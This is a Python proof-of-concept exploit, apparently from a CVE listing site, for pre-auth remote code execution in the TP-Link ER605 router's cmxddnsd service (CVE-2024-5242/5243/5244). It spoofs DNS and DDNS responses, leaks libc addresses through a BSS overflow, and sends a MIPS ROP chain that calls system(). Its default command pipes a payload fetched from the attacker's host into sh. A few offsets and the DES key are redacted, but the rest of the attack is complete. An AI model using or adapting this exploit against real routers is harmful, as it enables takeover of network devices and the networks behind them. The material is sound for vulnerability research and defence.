4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2024-5242 / CVE-2024-5243 / CVE-2024-5244
TP-Link ER605 cmxddnsd Pre-Auth RCE Exploit
============================================

Two-phase exploit:
  Phase 1: Info leak via BSS overflow to bypass ASLR
  Phase 2: ROP chain via stack overflow for RCE

Prerequisites:
  - MITM position on target router's WAN interface
  - Ability to intercept DNS queries and spoof responses
  - Ability to serve malicious DDNS responses on UDP 9994

Key insight: ErrorCode value is cached in libc's anonymous mapping region.
This address is NULL-free, making it usable in the ROP payload.

Gadget (MIPS delay slot):
  move $t9, $s0     ; $t9 = system address
  jalr $t9          ; call system()
  move $a0, $s1     ; DELAY SLOT: $a0 = command string

Payload Layout:
  [0-N]:    "7;cmd;" - atoi returns 7, shell executes cmd
  [N-43]:   padding
  [44-47]:  $s0 = system()
  [48-51]:  $s1 = command string address (libc anon region)
  [52-55]:  $ra = ROP gadget
  [56]:     0x01 (field separator)
"""

import socket
import struct
import threading
import sys
import os
import base64
import time

# ============================================================================
# Configuration
# ============================================================================

LISTEN_IP = "0.0.0.0"
DNS_PORT = 53
DDNS_PORT = 9994

ATTACKER_IP = os.environ.get('ATTACKER_IP', '192.168.0.100')

# ============================================================================
# Addresses and Offsets (REDACTED - fill in based on target libc)
# ============================================================================

# libc offsets - must be determined through reverse engineering
LIBC_CMD_OFFSET = 0x0        # Where ErrorCode string is cached (must be NULL-free)
LIBC_SYSTEM_OFFSET = 0x0     # system() function offset
LIBC_GADGET_OFFSET = 0x0     # ROP gadget: move $t9,$s0; jalr $t9; move $a0,$s1

# Info leak configuration
OFFSET_TO_SENDSIZE = 279     # Distance to sendSize variable in _sndDnsQuery
INFO_LEAK_SIZE = 0x0404      # Size to trigger in OOB read

# Info leak analysis offsets - must be determined through dynamic analysis
LEAK_POINTER_OFFSET = 0x0    # Offset in leaked data containing libc pointer
LEAK_TO_LIBC_OFFSET = 0x0    # Offset from leaked pointer to libc base

# ErrorCode stack overflow offsets (fixed based on binary analysis)
ERRORCODE_TO_S0 = 44         # Offset from ErrorCode buffer to saved $s0
ERRORCODE_TO_S1 = 48         # Offset from ErrorCode buffer to saved $s1
ERRORCODE_TO_RA = 52         # Offset from ErrorCode buffer to saved $ra

# ============================================================================
# Crypto Implementation (CVE-2024-5244)
# ============================================================================

# Hardcoded DES key from binary (after extraction from .rodata)
DES_KEY_RAW = bytes([0x00] * 8)  # REDACTED - extract from binary

# Custom Base64 alphabet
STD_B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TPL_B64 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789*_"
ENCODE_TABLE = str.maketrans(STD_B64, TPL_B64)

def p32(v): return struct.pack('<I', v & 0xffffffff)
def u32(d): return struct.unpack('<I', d)[0]

def vnc_key(key):
    """VNC-style bit reversal for each byte of the key"""
    result = bytearray(8)
    for i in range(8):
        b = key[i] if i < len(key) else 0
        r = 0
        for bit in range(8):
            if b & (1 << bit):
                r |= (1 << (7 - bit))
        result[i] = r
    return bytes(result)

# DES S-boxes
SBOXES = [
    [14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7,0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8,4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0,15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13],
    [15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10,3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5,0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15,13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9],
    [10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8,13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1,13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7,1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12],
    [7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15,13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9,10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4,3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14],
    [2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9,14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6,4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14,11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3],
    [12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11,10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8,9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6,4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13],
    [4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1,13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6,1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2,6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12],
    [13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7,1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2,7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8,2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11]
]

# DES permutation tables
IP = [58,50,42,34,26,18,10,2,60,52,44,36,28,20,12,4,62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8,57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3,61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7]
IP_INV = [40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31,38,6,46,14,54,22,62,30,37,5,45,13,53,21,61,29,36,4,44,12,52,20,60,28,35,3,43,11,51,19,59,27,34,2,42,10,50,18,58,26,33,1,41,9,49,17,57,25]
E = [32,1,2,3,4,5,4,5,6,7,8,9,8,9,10,11,12,13,12,13,14,15,16,17,16,17,18,19,20,21,20,21,22,23,24,25,24,25,26,27,28,29,28,29,30,31,32,1]
P = [16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25]
PC1 = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
PC2 = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
SHIFTS = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]

def permute(block, table): return [block[x-1] for x in table]
def xor(a, b): return [x ^ y for x, y in zip(a, b)]

def bytes_to_bits(data):
    bits = []
    for byte in data:
        for i in range(7, -1, -1):
            bits.append((byte >> i) & 1)
    return bits

def bits_to_bytes(bits):
    result = []
    for i in range(0, len(bits), 8):
        byte = 0
        for j in range(8):
            byte = (byte << 1) | bits[i + j]
        result.append(byte)
    return bytes(result)

def des_key_schedule(key_bits):
    key56 = permute(key_bits, PC1)
    C, D = key56[:28], key56[28:]
    round_keys = []
    for shift in SHIFTS:
        C = C[shift:] + C[:shift]
        D = D[shift:] + D[:shift]
        round_keys.append(permute(C + D, PC2))
    return round_keys

def des_f(R, K):
    expanded = permute(R, E)
    xored = xor(expanded, K)
    output = []
    for i in range(8):
        chunk = xored[i*6:(i+1)*6]
        row = (chunk[0] << 1) | chunk[5]
        col = (chunk[1] << 3) | (chunk[2] << 2) | (chunk[3] << 1) | chunk[4]
        val = SBOXES[i][row * 16 + col]
        for j in range(3, -1, -1):
            output.append((val >> j) & 1)
    return permute(output, P)

def des_encrypt_block(block_bits, round_keys):
    block = permute(block_bits, IP)
    L, R = block[:32], block[32:]
    for i in range(16):
        new_R = xor(L, des_f(R, round_keys[i]))
        L, R = R, new_R
    return permute(R + L, IP_INV)

def des_encrypt(key8, plaintext):
    ks = des_key_schedule(bytes_to_bits(key8))
    pad_len = 8 - (len(plaintext) % 8)
    padded = plaintext + bytes([pad_len] * pad_len)
    ciphertext = b''
    for i in range(0, len(padded), 8):
        block = bytes_to_bits(padded[i:i+8])
        block = des_encrypt_block(block, ks)
        ciphertext += bits_to_bytes(block)
    return ciphertext

def custom_b64_encode(data):
    """Encode with Comexe's custom Base64 alphabet"""
    return base64.b64encode(data).decode().translate(ENCODE_TABLE)

def tplink_encrypt(data):
    """Full encryption: DES + custom Base64"""
    if isinstance(data, str): data = data.encode()
    return custom_b64_encode(des_encrypt(vnc_key(DES_KEY_RAW), data))

def build_ddns_packet(payload):
    """Build complete DDNS response packet"""
    if isinstance(payload, str): payload = payload.encode()
    return b'\x01C=2\x01Data=' + tplink_encrypt(payload).encode() + b'\x01'

# ============================================================================
# Helpers
# ============================================================================

def check_null_bytes(addr, name):
    """Check if address contains NULL bytes (would break strncpy)"""
    addr_bytes = p32(addr)
    if b'\x00' in addr_bytes:
        print(f"[!] WARNING: {name} (0x{addr:08x}) contains NULL byte: {addr_bytes.hex()}")
        return True
    return False

# ============================================================================
# Phase 1: Info Leak (CVE-2024-5242)
# ============================================================================

def build_info_leak_payload():
    """
    Build payload for BSS overflow -> OOB read info leak.
    
    Overwrites sendSize variable in _sndDnsQuery stack frame,
    causing sendto() to transmit extra memory containing libc pointers.
    """
    # Pad to reach sendSize, then overwrite with large value
    dns_name = b'A' * OFFSET_TO_SENDSIZE
    dns_name += struct.pack('<H', INFO_LEAK_SIZE)
    dns_name += b'/'  # Terminate the copy loop
    
    payload = (
        b'\x01OK=N'
        b'\x01MSG=Error'
        b'\x01ErrorCode=7'           # Triggers UpdateSvr parsing
        b'\x01UpdateSvr1=' + dns_name +
        b'\x01UpdateSvr2=Dns1.comexe.net'
        b'\x01'
    )
    return payload

def analyze_leak(data):
    """
    Analyze leaked data to extract libc base address.
    
    The oversized DNS query contains memory from ddns_instance structure,
    which includes libc pointers that can be used to calculate libc base.
    """
    print(f"\n[LEAK] Received {len(data)} bytes")
    
    if len(data) < LEAK_POINTER_OFFSET + 4:
        print(f"[!] Data too short, need at least {LEAK_POINTER_OFFSET + 4} bytes")
        return None
    
    leaked_ptr = u32(data[LEAK_POINTER_OFFSET:LEAK_POINTER_OFFSET+4])
    libc_base = leaked_ptr - LEAK_TO_LIBC_OFFSET
    
    print(f"[+] Leaked pointer: 0x{leaked_ptr:08x}")
    print(f"[+] libc_base = 0x{libc_base:08x}")
    
    return libc_base

# ============================================================================
# Phase 2: ROP Exploit (CVE-2024-5243)
# ============================================================================

def build_rop_payload(libc_base, command):
    """
    Build ROP payload for ErrorCode stack overflow.
    
    The ErrorCode string is cached in libc's anonymous mapping region,
    which provides a NULL-free address for the command string.
    """
    cmd_addr = libc_base + LIBC_CMD_OFFSET
    system_addr = libc_base + LIBC_SYSTEM_OFFSET
    gadget_addr = libc_base + LIBC_GADGET_OFFSET
    
    print(f"\n[ROP] Building exploit payload")
    print(f"      libc_base:     0x{libc_base:08x}")
    print(f"      cmd_addr:      0x{cmd_addr:08x} (libc + 0x{LIBC_CMD_OFFSET:x})")
    print(f"      system:        0x{system_addr:08x}")
    print(f"      gadget:        0x{gadget_addr:08x}")
    print(f"      command:       {command}")
    
    # Verify no NULL bytes in addresses
    has_null = False
    has_null |= check_null_bytes(cmd_addr, "cmd_addr")
    has_null |= check_null_bytes(system_addr, "system")
    has_null |= check_null_bytes(gadget_addr, "gadget")
    
    if has_null:
        print(f"\n[!] NULL byte detected! Exploit may fail.")
    
    # Build payload (57 bytes total)
    payload = bytearray(57)
    
    # Command string: "7" + shell command
    # "7" makes atoi() return 7, enabling normal function return
    full_cmd = f"7{command}"
    cmd_bytes = full_cmd.encode()
    cmd_len = len(cmd_bytes)
    
    if cmd_len > ERRORCODE_TO_S0:
        print(f"[!] Command too long! Max {ERRORCODE_TO_S0} bytes, got {cmd_len}")
        return None
    
    # [0-N]: Command string
    payload[0:cmd_len] = cmd_bytes
    
    # [N-43]: Padding
    for i in range(cmd_len, ERRORCODE_TO_S0):
        payload[i] = ord('A')
    
    # [44-47]: $s0 = system()
    payload[ERRORCODE_TO_S0:ERRORCODE_TO_S0+4] = p32(system_addr)
    
    # [48-51]: $s1 = command string address
    payload[ERRORCODE_TO_S1:ERRORCODE_TO_S1+4] = p32(cmd_addr)
    
    # [52-55]: $ra = ROP gadget
    payload[ERRORCODE_TO_RA:ERRORCODE_TO_RA+4] = p32(gadget_addr)
    
    # [56]: Field separator
    payload[56] = 0x01
    
    print(f"\n[ROP] ErrorCode payload ({len(payload)} bytes):")
    print(f"      [0-{cmd_len-1}]:   '7{command}' (atoi=7 + shell cmd)")
    print(f"      [{cmd_len}-43]:  'A' padding")
    print(f"      [44-47]:  $s0 = 0x{system_addr:08x} (system)")
    print(f"      [48-51]:  $s1 = 0x{cmd_addr:08x} (cmd in libc anon)")
    print(f"      [52-55]:  $ra = 0x{gadget_addr:08x} (gadget)")
    print(f"      [56]:     0x01 (separator)")
    
    return bytes(payload)

def build_exploit_response(libc_base, command):
    """Build complete exploit DDNS response packet"""
    errorcode_payload = build_rop_payload(libc_base, command)
    if errorcode_payload is None:
        return None
    
    inner = (
        b'\x01OK=N'
        b'\x01MSG=pwned'
        b'\x01ErrorCode=' + errorcode_payload +
        b'UpdateSvr1=x'
        b'\x01'
    )
    
    print(f"\n[ROP] Exploit packet built")
    
    return build_ddns_packet(inner)

# ============================================================================
# Servers
# ============================================================================

class ExploitState:
    """Shared state between DNS and DDNS servers"""
    def __init__(self):
        self.phase = 1           # 1 = info leak, 2 = ROP exploit
        self.libc_base = None
        self.exploit_sent = False
        self.lock = threading.Lock()
        self.command = ";touch /tmp/pwned;"

class DNSServer:
    """
    Malicious DNS server that:
    1. Spoofs responses to redirect DDNS traffic to attacker
    2. Captures oversized queries for info leak analysis
    """
    def __init__(self, state, spoof_ip):
        self.state = state
        self.spoof_ip = spoof_ip
        self.sock = None
        self.running = False
        
    def handle_packet(self, data, addr):
        # Check for info leak (oversized DNS query)
        if len(data) > 100 and self.state.phase == 1:
            print(f"\n[PHASE 1] INFO LEAK! Size: {len(data)} bytes")
            with self.state.lock:
                libc_base = analyze_leak(data)
                if libc_base:
                    self.state.libc_base = libc_base
                    self.state.phase = 2
                    print(f"\n[+] Moving to Phase 2 - ROP Exploit")
        
        # Build spoofed DNS response
        if len(data) >= 12:
            txid = data[:2]
            response = txid + bytes([
                0x81, 0x80,  # Flags: response, no error
                0x00, 0x01,  # Questions: 1
                0x00, 0x01,  # Answers: 1
                0x00, 0x00,  # Authority: 0
                0x00, 0x00   # Additional: 0
            ])
            response += data[12:]  # Copy question section
            response += bytes([
                0xc0, 0x0c,  # Name pointer
                0x00, 0x01,  # Type: A
                0x00, 0x01,  # Class: IN
                0x00, 0x00, 0x00, 0x3c,  # TTL: 60
                0x00, 0x04   # Data length: 4
            ])
            response += socket.inet_aton(self.spoof_ip)
            return response
        return None
        
    def start(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DNS] Server listening on port {DNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                response = self.handle_packet(data, addr)
                if response:
                    self.sock.sendto(response, addr)
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DNS] Error: {e}")
                    
    def stop(self):
        self.running = False
        if self.sock:
            self.sock.close()

class DDNSServer:
    """
    Malicious DDNS server that sends exploit payloads.
    Phase 1: Info leak payload
    Phase 2: ROP exploit payload
    """
    def __init__(self, state):
        self.state = state
        self.sock = None
        self.running = False
        
    def start(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((LISTEN_IP, DDNS_PORT))
        self.sock.settimeout(1.0)
        self.running = True
        print(f"[DDNS] Server listening on port {DDNS_PORT}")
        
        while self.running:
            try:
                data, addr = self.sock.recvfrom(4096)
                print(f"\n[DDNS] Request from {addr[0]}:{addr[1]}")
                
                with self.state.lock:
                    if self.state.phase == 1:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 1] Sending info leak payload")
                        print(f"{'='*60}")
                        payload = build_info_leak_payload()
                        response = build_ddns_packet(payload)
                        self.sock.sendto(response, addr)
                        
                    elif self.state.phase == 2 and not self.state.exploit_sent:
                        print(f"\n{'='*60}")
                        print(f"[PHASE 2] Sending ROP exploit!")
                        print(f"{'='*60}")
                        
                        response = build_exploit_response(
                            self.state.libc_base,
                            self.state.command
                        )
                        
                        if response:
                            self.sock.sendto(response, addr)
                            self.state.exploit_sent = True
                            print(f"\n[+] Exploit sent! Check for shell connection.")
                        else:
                            print("[!] Failed to build exploit")
                            # Send benign response
                            benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                            response = build_ddns_packet(benign)
                            self.sock.sendto(response, addr)
                    else:
                        # Already exploited or benign response
                        benign = b'\x01OK=Y\x01MSG=Success\x01ErrorCode=0\x01'
                        response = build_ddns_packet(benign)
                        self.sock.sendto(response, addr)
                        
            except socket.timeout:
                continue
            except Exception as e:
                if self.running:
                    print(f"[DDNS] Error: {e}")
                    import traceback
                    traceback.print_exc()
                    
    def stop(self):
        self.running = False
        if self.sock:
            self.sock.close()

# ============================================================================
# Main
# ============================================================================

def print_banner():
    print("""
╔═══════════════════════════════════════════════════════════════════════╗
║     CVE-2024-5242/5243/5244 - TP-Link ER605 Pre-Auth RCE Exploit      ║
╠═══════════════════════════════════════════════════════════════════════╣
║  Prerequisites:                                                       ║
║    - MITM position on target's WAN interface                          ║
║    - Intercept DNS queries, spoof responses to attacker IP            ║
║                                                                       ║
║  Attack Flow:                                                         ║
║    Phase 1: BSS overflow → OOB read → libc address leak               ║
║    Phase 2: Stack overflow → ROP chain → system(command)              ║
║                                                                       ║
║  ROP Gadget: move $t9,$s0; jalr $t9; move $a0,$s1                     ║
╚═══════════════════════════════════════════════════════════════════════╝
    """)

def main():
    print_banner()
    
    # Check if offsets are configured
    if LIBC_CMD_OFFSET == 0x0 or LIBC_SYSTEM_OFFSET == 0x0 or LIBC_GADGET_OFFSET == 0x0:
        print("[!] WARNING: libc offsets not configured!")
        print("[!] Edit the script to fill in the offset values for your target.")
        print()
    
    if len(sys.argv) < 2:
        print(f"Usage: sudo {sys.argv[0]} <ATTACKER_IP>")
        print(f"Example: sudo {sys.argv[0]} 192.168.0.100")
        return 1
    
    attacker_ip = sys.argv[1]
    command = f";curl {attacker_ip}:8080/s|sh;#"
    
    print(f"[*] Attacker IP: {attacker_ip}")
    print(f"[*] Command: {command}")
    
    # Initialize state
    state = ExploitState()
    state.command = command
    
    # Start DNS server (requires root)
    dns = DNSServer(state, attacker_ip)
    dns_thread = threading.Thread(target=dns.start, daemon=True)
    dns_thread.start()
    
    # Start DDNS server
    ddns = DDNSServer(state)
    
    print(f"\n[*] Servers started!")
    print(f"[*] Waiting for target connection...")
    print(f"[*] (Target must resolve Dns1.comexe.net to {attacker_ip})")
    print(f"[*] Press Ctrl+C to stop\n")
    
    try:
        ddns.start()
    except KeyboardInterrupt:
        print("\n[*] Stopping...")
        dns.stop()
        ddns.stop()
    
    return 0

if __name__ == "__main__":
    sys.exit(main())